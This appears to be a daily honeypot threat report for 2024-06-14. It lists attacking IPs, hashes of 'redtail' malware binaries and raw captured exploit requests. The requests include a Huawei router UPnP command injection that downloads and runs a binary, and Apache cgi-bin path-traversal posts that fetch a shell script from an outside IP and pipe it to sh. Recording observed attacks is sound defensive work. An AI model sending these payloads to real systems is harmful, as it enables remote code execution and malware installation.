Top 5 IPs for 2024-06-14 :

185.81.30.183
45.236.49.76
68.183.221.93
51.210.243.91
150.109.196.110

Malware Observed:

File name : redtail.arm7
ea9f3911ff2884621874c1e98b5dc9139964adeab333b92816eb5c307d73a67f
https://www.virustotal.com/gui/file/ea9f3911ff2884621874c1e98b5dc9139964adeab333b92816eb5c307d73a67f

File name : redtail.arm8
720b3d089679f26e02c2f9bf05a466e768557b91627e840a2cd26eb480dc8418
https://www.virustotal.com/gui/file/720b3d089679f26e02c2f9bf05a466e768557b91627e840a2cd26eb480dc8418

File name : redtail.i686
9ef2ef02376445bf4c145820c0c81f2bbe0b96f2017278562e0bd259bf7bd061
https://www.virustotal.com/gui/file/9ef2ef02376445bf4c145820c0c81f2bbe0b96f2017278562e0bd259bf7bd061

File name : redtail.x86_64
ab897157fdef11b267e986ef286fd44a699e3699a458d90994e020619653d2cd
https://www.virustotal.com/gui/file/ab897157fdef11b267e986ef286fd44a699e3699a458d90994e020619653d2cd



Commands/exploits observed:


POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
Content-Length: 453

<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.236 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Accept: */*
Connection: keep-alive
Host: HOST IP
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Length: 105
Content-Type: text/plain

X=$(curl http://185.172.128.93/sh || wget http://185.172.128.93/sh -O-); echo "$X" | sh -s apache.selfrepPOST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
Accept: */*
Connection: keep-alive
Host: HOST IP
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Length: 105
Content-Type: text/plain

X=$(curl http://185.172.128.93/sh || wget http://185.172.128.93/sh -O-); echo "$X" | sh -s apache.selfrep
